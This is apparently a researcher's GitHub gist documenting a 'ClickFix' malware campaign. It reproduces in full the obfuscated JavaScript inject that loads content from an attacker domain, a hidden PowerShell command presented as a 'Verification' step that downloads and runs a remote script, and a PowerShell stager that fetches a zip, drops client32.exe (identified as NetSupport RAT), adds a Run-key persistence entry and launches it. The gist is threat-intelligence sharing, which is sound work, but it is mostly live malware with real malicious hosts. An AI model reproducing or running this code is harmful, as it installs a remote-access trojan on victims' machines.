Skip to content

Instantly share code, notes, and snippets.

@lpowell

lpowell/clickfix.js Secret

Last active July 16, 2025 14:31
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save lpowell/a71e7f749a86a810708b3a83cb5774fa to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save lpowell/a71e7f749a86a810708b3a83cb5774fa to your computer and use it in GitHub Desktop.
Download ZIP
ClickFix - July 16th/17th, 2025
Raw
clickfix.js
(function (_0x22478f, _0x4e9c81) {
const _0x1a0d16 = _0x14d6,
_0x55d084 = _0x22478f();
while (!![]) {
try {
const _0x51f75b = parseInt(_0x1a0d16(0xb0)) / 0x1 * (parseInt(_0x1a0d16(0x92)) / 0x2) + parseInt(_0x1a0d16(0xa3)) / 0x3 * (parseInt(_0x1a0d16(0xb4)) / 0x4) + parseInt(_0x1a0d16(0xc5)) / 0x5 + -parseInt(_0x1a0d16(0x8e)) / 0x6 * (parseInt(_0x1a0d16(0xa1)) / 0x7) + -parseInt(_0x1a0d16(0xab)) / 0x8 * (-parseInt(_0x1a0d16(0xb5)) / 0x9) + -parseInt(_0x1a0d16(0xbf)) / 0xa + -parseInt(_0x1a0d16(0xc2)) / 0xb * (parseInt(_0x1a0d16(0xc3)) / 0xc);
if (_0x51f75b === _0x4e9c81) break;
else _0x55d084['push'](_0x55d084['shift']());
} catch (_0x50ac1a) {
_0x55d084['push'](_0x55d084['shift']());
}
}
}(_0x2922, 0xe0b5e), (function (_0x4592cb, _0xcbb13b) {
const _0x313ab9 = _0x14d6,
_0x4b3084 = _0x497e,
_0x3bcba6 = _0x4592cb();
while (!![]) {
try {
const _0x4c5448 = parseInt(_0x4b3084(0x117)) / 0x1 * (-parseInt(_0x4b3084(0x126)) / 0x2) + parseInt(_0x4b3084(0x106)) / 0x3 * (-parseInt(_0x4b3084(0x107)) / 0x4) + -parseInt(_0x4b3084(0x114)) / 0x5 * (-parseInt(_0x4b3084(0xee)) / 0x6) + -parseInt(_0x4b3084(0x110)) / 0x7 + -parseInt(_0x4b3084(0x11e)) / 0x8 * (parseInt(_0x4b3084(0x112)) / 0x9) + -parseInt(_0x4b3084(0x10e)) / 0xa * (parseInt(_0x4b3084(0x115)) / 0xb) + parseInt(_0x4b3084(0xfe)) / 0xc;
if (_0x4c5448 === _0xcbb13b) break;
else _0x3bcba6[_0x313ab9(0xb9)](_0x3bcba6[_0x313ab9(0xb7)]());
} catch (_0x1cceaa) {
_0x3bcba6['push'](_0x3bcba6[_0x313ab9(0xb7)]());
}
}
}(_0x19d1, 0xa98f0), (function (_0x51ab62, _0x249b90) {
const _0xd3ef6e = _0x14d6,
_0x5f22a = _0x497e,
_0x157123 = _0x11e7,
_0xbf1d91 = _0x51ab62();
while (!![]) {
try {
const _0x400e34 = -parseInt(_0x157123(0x1d5)) / 0x1 * (parseInt(_0x157123(0x1dd)) / 0x2) + parseInt(_0x157123(0x1f6)) / 0x3 * (parseInt(_0x157123(0x1f7)) / 0x4) + -parseInt(_0x157123(0x1f5)) / 0x5 * (-parseInt(_0x157123(0x1d1)) / 0x6) + -parseInt(_0x157123(0x1ef)) / 0x7 * (parseInt(_0x157123(0x1d6)) / 0x8) + -parseInt(_0x157123(0x1e3)) / 0x9 * (-parseInt(_0x157123(0x1e2)) / 0xa) + -parseInt(_0x157123(0x201)) / 0xb * (-parseInt(_0x157123(0x1d4)) / 0xc) + parseInt(_0x157123(0x1d0)) / 0xd * (-parseInt(_0x157123(0x1ec)) / 0xe);
if (_0x400e34 === _0x249b90) break;
else _0xbf1d91['push'](_0xbf1d91[_0xd3ef6e(0xb7)]());
} catch (_0x1f01c3) {
_0xbf1d91[_0x5f22a(0x113)](_0xbf1d91[_0x5f22a(0xef)]());
}
}
}(_0x2464, 0x48a0b), function (_0x594e9a, _0x44f2b6) {
const _0x1b466f = _0x497e,
_0x155747 = _0x11e7,
_0x315c24 = _0x21ac,
_0x2b2c80 = _0x594e9a();
while (!![]) {
try {
const _0x486e66 = parseInt(_0x315c24(0xde)) / 0x1 * (parseInt(_0x315c24(0xed)) / 0x2) + -parseInt(_0x315c24(0xfc)) / 0x3 + -parseInt(_0x315c24(0xf9)) / 0x4 * (-parseInt(_0x315c24(0xf0)) / 0x5) + -parseInt(_0x315c24(0xf8)) / 0x6 + -parseInt(_0x315c24(0xff)) / 0x7 * (-parseInt(_0x315c24(0xfa)) / 0x8) + parseInt(_0x315c24(0xfe)) / 0x9 * (parseInt(_0x315c24(0xf1)) / 0xa) + parseInt(_0x315c24(0xf7)) / 0xb;
if (_0x486e66 === _0x44f2b6) break;
else _0x2b2c80[_0x155747(0x1df)](_0x2b2c80[_0x1b466f(0xef)]());
} catch (_0x418a78) {
_0x2b2c80[_0x155747(0x1df)](_0x2b2c80[_0x1b466f(0xef)]());
}
}
}(_0x3196, 0xbf6e0))));
function _0x1d0b() {
const _0x270a1b = _0x14d6,
_0x4added = _0x497e,
_0x2c643d = _0x11e7,
_0x236fbe = _0x21ac,
_0x1af331 = [_0x2c643d(0x1d2), _0x236fbe(0xee), _0x236fbe(0xf5), _0x236fbe(0xec), _0x236fbe(0xf2), _0x236fbe(0xfb), _0x4added(0x11f), _0x236fbe(0xe7), _0x236fbe(0xe0), _0x236fbe(0xef), _0x2c643d(0x1dc), _0x236fbe(0xe1), _0x2c643d(0x1da), _0x236fbe(0xe3), _0x236fbe(0xe2), _0x236fbe(0xdf), _0x236fbe(0xfd), _0x270a1b(0x93), _0x236fbe(0xeb), _0x2c643d(0x1ff), _0x236fbe(0xe6), _0x236fbe(0xea), _0x236fbe(0xe8), _0x4added(0x10a), _0x236fbe(0xe4), _0x236fbe(0xf3), _0x2c643d(0x1e4), _0x236fbe(0x100), _0x236fbe(0xe9), _0x2c643d(0x1fd)];
return _0x1d0b = function () {
return _0x1af331;
}, _0x1d0b();
}
function _0x2922() {
const _0x3bb446 = ['style', 'script', '25ZqGTnr', '11DTvDEI', '3405100lPOSAO', '4060107xpUBhS', 'length', '55soOXYw', '2037396dcpvRU', '55jjqkUA', '3654125CEtaFX', '193554eDXPJA', '46simpRV', 'test', '9VRspco', '408512JCsEGD', '126WHFZQY', 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789', 'body', 'floor', '95834MJJwGr', '14cVpfVt', '358pfUIUA', '20CByCPA', '207mMGNyF', '28141520yDcQZI', '7SklqRM', '1376490vkhqrs', '4676568ddJeoB', '3081039kvfvBc', '36846RilJSA', '7SMKREv', '10754176kvpesB', 'random', '20136wgJjdC', '373618ubKVXG', 'charAt', '3jSowEo', '16egcZLY', '927366XLbLVw', '61417332qUWKeT', '1958152RPNEBr', '649296ReKcka', '1570JCKZTG', '2909928gCVreq', '72UxMaWt', 'getItem', 'width:100%; height:100%; position:fixed; top:0; left:0; z-index:9999; border:none;', 'now', 'setItem', '17qRskiA', '141876gRrTWd', 'cssText', 'DOMContentLoaded', '5572808wXVJvw', '292077KSjucS', '73xcYREI', 'shift', '456356thsZDo', 'push', '217305vqaWHD'];
_0x2922 = function () {
return _0x3bb446;
};
return _0x2922();
}
function _0x2464() {
const _0xe978fb = _0x14d6,
_0x25439e = _0x497e,
_0x2f4c71 = [_0x25439e(0xf1), _0x25439e(0xff), _0x25439e(0x103), _0x25439e(0xf5), _0x25439e(0x12a), _0x25439e(0xfc), _0x25439e(0x122), _0x25439e(0x105), '635170iJCWrr', _0x25439e(0x100), _0xe978fb(0xae), _0x25439e(0xf2), _0x25439e(0x11a), _0x25439e(0x125), _0x25439e(0x118), '26ARvfvT', _0x25439e(0x11b), _0x25439e(0x102), _0x25439e(0xec), _0x25439e(0x11c), _0x25439e(0x104), _0x25439e(0xf3), _0x25439e(0x111), _0x25439e(0x109), _0x25439e(0xf8), _0x25439e(0x10d), _0x25439e(0x10c), _0x25439e(0xfa), _0x25439e(0x128), _0x25439e(0x123), 'push', _0x25439e(0x121), _0x25439e(0xf0), _0x25439e(0xfd), _0x25439e(0x10b), _0x25439e(0x12b), _0x25439e(0xed), _0x25439e(0x10f), _0x25439e(0xf4), _0x25439e(0xf7), _0x25439e(0x11d), _0x25439e(0x12c), _0x25439e(0x119), _0x25439e(0x120), _0x25439e(0x101), _0x25439e(0x127), _0x25439e(0x116), _0x25439e(0x108), _0xe978fb(0xbc), _0x25439e(0xef), 'userAgent', _0x25439e(0x124), _0x25439e(0x129)];
return _0x2464 = function () {
return _0x2f4c71;
}, _0x2464();
}
function _0x14d6(_0x22d0b5, _0x1927d6) {
const _0x292233 = _0x2922();
return _0x14d6 = function (_0x14d635, _0x5b6034) {
_0x14d635 = _0x14d635 - 0x8a;
let _0x3b4e28 = _0x292233[_0x14d635];
return _0x3b4e28;
}, _0x14d6(_0x22d0b5, _0x1927d6);
}
function _0x21ac(_0x19c95a, _0x3b28b9) {
const _0x3fc446 = _0x3196();
return _0x21ac = function (_0x5efb45, _0x1dd6e8) {
_0x5efb45 = _0x5efb45 - 0xde;
let _0x3252e0 = _0x3fc446[_0x5efb45];
return _0x3252e0;
}, _0x21ac(_0x19c95a, _0x3b28b9);
}
function _0x4fc5(_0x2a3902, _0xc8515b) {
const _0x42c2ea = _0x1d0b();
return _0x4fc5 = function (_0x34ab2f, _0x30a8c5) {
_0x34ab2f = _0x34ab2f - 0x71;
let _0x5693e3 = _0x42c2ea[_0x34ab2f];
return _0x5693e3;
}, _0x4fc5(_0x2a3902, _0xc8515b);
}
function _0x3196() {
const _0xf655e3 = _0x14d6,
_0x3bd0b2 = _0x497e,
_0x10dec1 = _0x11e7,
_0x49f922 = [_0x10dec1(0x1f2), _0x10dec1(0x1f3), _0x10dec1(0x1d8), _0x10dec1(0x1ce), _0x10dec1(0x1d3), _0x10dec1(0x1e5), _0xf655e3(0x9e), _0x10dec1(0x1cf), _0x10dec1(0x1e6), _0x10dec1(0x1db), _0x10dec1(0x1fb), _0x10dec1(0x1e1), _0x10dec1(0x1f9), _0x10dec1(0x1df), _0x10dec1(0x1ea), _0x10dec1(0x1fc), _0x10dec1(0x1fa), _0x10dec1(0x1f1), _0x10dec1(0x202), _0x3bd0b2(0xf9), _0x10dec1(0x1f4), _0x10dec1(0x200), _0x10dec1(0x1ed), _0x10dec1(0x1de), _0x10dec1(0x1f0), 'appendChild', _0x10dec1(0x1eb), _0x10dec1(0x1d7), _0x10dec1(0x1ee), _0x3bd0b2(0xf6), _0x10dec1(0x1d9), _0x3bd0b2(0xfb), _0x10dec1(0x1e0), _0x10dec1(0x1e9), _0x10dec1(0x1fe), _0x10dec1(0x1e8)];
return _0x3196 = function () {
return _0x49f922;
}, _0x3196();
}
const _0x4eba19 = _0x4fc5;
(function (_0x25d81c, _0x57b9de) {
const _0x5dc90e = _0x21ac,
_0x4a8eab = _0x4fc5,
_0x4b0a9c = _0x25d81c();
while (!![]) {
try {
const _0x17fc96 = -parseInt(_0x4a8eab(0x73)) / 0x1 + parseInt(_0x4a8eab(0x75)) / 0x2 + parseInt(_0x4a8eab(0x8b)) / 0x3 * (-parseInt(_0x4a8eab(0x86)) / 0x4) + -parseInt(_0x4a8eab(0x79)) / 0x5 * (-parseInt(_0x4a8eab(0x82)) / 0x6) + -parseInt(_0x4a8eab(0x8a)) / 0x7 * (-parseInt(_0x4a8eab(0x76)) / 0x8) + parseInt(_0x4a8eab(0x80)) / 0x9 * (-parseInt(_0x4a8eab(0x7d)) / 0xa) + parseInt(_0x4a8eab(0x7e)) / 0xb;
if (_0x17fc96 === _0x57b9de) break;
else _0x4b0a9c[_0x5dc90e(0x101)](_0x4b0a9c[_0x5dc90e(0xf4)]());
} catch (_0x442c3d) {
_0x4b0a9c[_0x5dc90e(0x101)](_0x4b0a9c[_0x5dc90e(0xf4)]());
}
}
}(_0x1d0b, 0xcae7a));
function _0x497e(_0x21170b, _0x5a59ac) {
const _0x49a6aa = _0x19d1();
return _0x497e = function (_0x1bbbf5, _0x25c30d) {
_0x1bbbf5 = _0x1bbbf5 - 0xec;
let _0x172da8 = _0x49a6aa[_0x1bbbf5];
return _0x172da8;
}, _0x497e(_0x21170b, _0x5a59ac);
}
function generateRandomString(_0x3b92e1) {
const _0x348d05 = _0x4fc5,
_0x1421bf = _0x348d05(0x7a);
let _0x54e7a6 = '';
for (let _0xe9cd64 = 0x0; _0xe9cd64 < _0x3b92e1; _0xe9cd64++) {
const _0x219e3c = Math[_0x348d05(0x88)](Math[_0x348d05(0x78)]() * _0x1421bf[_0x348d05(0x81)]);
_0x54e7a6 += _0x1421bf[_0x348d05(0x8e)](_0x219e3c);
}
return _0x54e7a6;
}
function checkLastVisit() {
const _0x4a24c2 = _0x11e7,
_0x2174d6 = _0x21ac,
_0x9bbdf3 = _0x4fc5,
_0x4336e9 = localStorage[_0x9bbdf3(0x85)](_0x9bbdf3(0x72));
if (!_0x4336e9) return localStorage[_0x4a24c2(0x1e7)](_0x9bbdf3(0x72), Date[_0x2174d6(0xe5)]()), ![];
return !![];
}
function createIframe(_0x334b35) {
const _0x4641bb = _0x497e,
_0x4c7a97 = _0x11e7,
_0x150307 = _0x4fc5,
_0x250dc6 = document[_0x4c7a97(0x1f8)](_0x150307(0x83));
_0x250dc6[_0x150307(0x74)][_0x150307(0x89)] = _0x150307(0x8d), _0x250dc6[_0x4641bb(0x109)] = _0x334b35, document[_0x150307(0x87)][_0x150307(0x77)](_0x250dc6);
}
function createScript(_0x34e1d2) {
const _0x23b4a3 = _0x11e7,
_0x16ff75 = _0x21ac,
_0x1fba22 = _0x4fc5,
_0x4c959b = document[_0x23b4a3(0x1f8)](_0x1fba22(0x84));
_0x4c959b[_0x16ff75(0xf6)] = _0x34e1d2, document[_0x1fba22(0x87)][_0x1fba22(0x77)](_0x4c959b);
}
function isMobileDevice() {
const _0x2eed8f = _0x4fc5;
return /Android|iPhone/i [_0x2eed8f(0x8c)](navigator[_0x2eed8f(0x7b)]);
}
function _0x11e7(_0x382f47, _0x19fea2) {
const _0x56bb7b = _0x2464();
return _0x11e7 = function (_0x23ffb5, _0x4c971e) {
_0x23ffb5 = _0x23ffb5 - 0x1ce;
let _0x1a1763 = _0x56bb7b[_0x23ffb5];
return _0x1a1763;
}, _0x11e7(_0x382f47, _0x19fea2);
}
window[_0x4eba19(0x7f)](_0x4eba19(0x7c), () => {
const _0x10b0d7 = _0x4eba19,
_0x5e2ca8 = generateRandomString(0x8),
_0x4af95d = _0x10b0d7(0x71) + _0x5e2ca8;
!checkLastVisit() && (isMobileDevice() ? createIframe(_0x4af95d) : createScript(_0x4af95d));
});
function _0x19d1() {
const _0x4603ac = _0x14d6,
_0xd15307 = [_0x4603ac(0xba), _0x4603ac(0x9d), '7471WxSZLk', _0x4603ac(0x97), _0x4603ac(0xa2), _0x4603ac(0x90), _0x4603ac(0xa0), _0x4603ac(0x9a), '10YxveAd', '1904WhnKVP', 'addEventListener', '1773282qNpfwf', _0x4603ac(0xc4), _0x4603ac(0x91), _0x4603ac(0x96), '586181OMIZwh', _0x4603ac(0xa5), _0x4603ac(0x94), _0x4603ac(0xb3), _0x4603ac(0x8a), '460kXczlx', _0x4603ac(0xc1), _0x4603ac(0xaa), _0x4603ac(0xb6), '8285256QyFgdN', _0x4603ac(0xb8), _0x4603ac(0xa8), _0x4603ac(0xb7), _0x4603ac(0x98), _0x4603ac(0xc6), _0x4603ac(0xbe), _0x4603ac(0xa7), _0x4603ac(0xaf), '1471504tSNQUj', _0x4603ac(0xa9), _0x4603ac(0xbb), _0x4603ac(0x8f), '80mFHYmI', 'iframe', _0x4603ac(0xb1), _0x4603ac(0xc0), _0x4603ac(0x99), _0x4603ac(0xa6), _0x4603ac(0xa4), _0x4603ac(0x8b), _0x4603ac(0xad), _0x4603ac(0xbd), 'createElement', '12983cJlwpx', _0x4603ac(0x9f), '12vmpGzQ', _0x4603ac(0x8d), 'https://ashesplayer.top/jjj/index.php?', 'src', 'lastVi', _0x4603ac(0x8c), _0x4603ac(0xb2), _0x4603ac(0xac), '600YzCalm', _0x4603ac(0x9b), '6656790DOkqNO', '243183HRXTHf', _0x4603ac(0x9c), _0x4603ac(0xb9), _0x4603ac(0x95)];
return _0x19d1 = function () {
return _0xd15307;
}, _0x19d1();
}.toString()
// powershell -nop -w hidden -c "$w=New-Object Net.WebClient;$i='http://sizzlingcareer.com:80/lal.ps1';iex($w.DownloadString($i))" # Verification (Ray ID: 648f102244d1e)
/*
$EDFTQ = "https://sizzlingcareer.com/hshs.zip?l=4838"
$FBUGAHHJBH = (New-Object System.Net.WebClient).DownloadData($EDFTQ)
$dffgds = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | ForEach-Object {[char]$_})
$JKFHKYZOTOBTXMVVRSEFJB = "$env:APPDATA\WinCodec\$dffgds"
if (-not (Test-Path $JKFHKYZOTOBTXMVVRSEFJB)) {
New-Item -Path $JKFHKYZOTOBTXMVVRSEFJB -ItemType Directory -Force | Out-Null
}
$DQKLB = New-Object System.IO.MemoryStream
$DQKLB.Write($FBUGAHHJBH, 0, $FBUGAHHJBH.Length)
$DQKLB.Position = 0
Add-Type -AssemblyName System.IO.Compression
$LJGTMSJOBKAGTLRIXVXWHFAXP = New-Object System.IO.Compression.ZipArchive($DQKLB, [System.IO.Compression.ZipArchiveMode]::Read)
foreach ($XCYMWUYSKVFE in $LJGTMSJOBKAGTLRIXVXWHFAXP.Entries) {
$JWZEFHTJFDGQ = Join-Path $JKFHKYZOTOBTXMVVRSEFJB $XCYMWUYSKVFE.FullName
$DUMPVLUPTZWBFMRVUMNJE = Split-Path $JWZEFHTJFDGQ -Parent
if (-not (Test-Path $DUMPVLUPTZWBFMRVUMNJE)) {
New-Item -Path $DUMPVLUPTZWBFMRVUMNJE -ItemType Directory -Force | Out-Null
}
if ($XCYMWUYSKVFE.Length -gt 0) {
$AGEHNPKN = $XCYMWUYSKVFE.Open()
$ZYLTWENSHIVDJG = [System.IO.File]::Create($JWZEFHTJFDGQ)
$AGEHNPKN.CopyTo($ZYLTWENSHIVDJG)
$ZYLTWENSHIVDJG.Close()
$AGEHNPKN.Close()
}
}
$LJGTMSJOBKAGTLRIXVXWHFAXP.Dispose()
$DQKLB.Dispose()
$RCXHSWENKYKBPFHEKPIORGXW = "$JKFHKYZOTOBTXMVVRSEFJB\client32.exe"
sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run WindowApplication1 $RCXHSWENKYKBPFHEKPIORGXW
Start-Process $RCXHSWENKYKBPFHEKPIORGXW
*/
/*
The payload is a NetSupport RAT deployment. Not very interesting.
*/
@lpowell
Copy link
Copy Markdown
Author

lpowell commented Jul 16, 2025

Tired of doing writeups for these, so I'm just posting them as gists now. See https://alertoverload.com for similar incident writeups.

JS is the inject code, PS is the payload.

Follow links at your own risk.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment